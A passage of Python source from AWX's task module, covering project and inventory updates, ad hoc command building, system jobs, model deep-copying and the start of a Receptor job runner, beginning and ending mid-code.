'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_cwd(self, project_update, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: containers
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join('/runner', rel_path) # TODO: make container paths elegant
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join('/runner', 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = injector.filename
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_cwd(self, inventory_update, private_data_dir):
"""
There is one case where the inventory "source" is in a different
location from the private data:
- SCM, where source needs to live in the project folder
"""
src = inventory_update.source
container_dir = '/runner' # TODO: make container paths elegant
if src == 'scm' and inventory_update.source_project_update:
return os.path.join(container_dir, 'project')
return container_dir
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_cwd(self, ad_hoc_command, private_data_dir):
return private_data_dir
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_cwd(self, instance, private_data_dir):
return settings.BASE_DIR
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
threading.Thread(target=self.transmit, args=[sockin]).start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
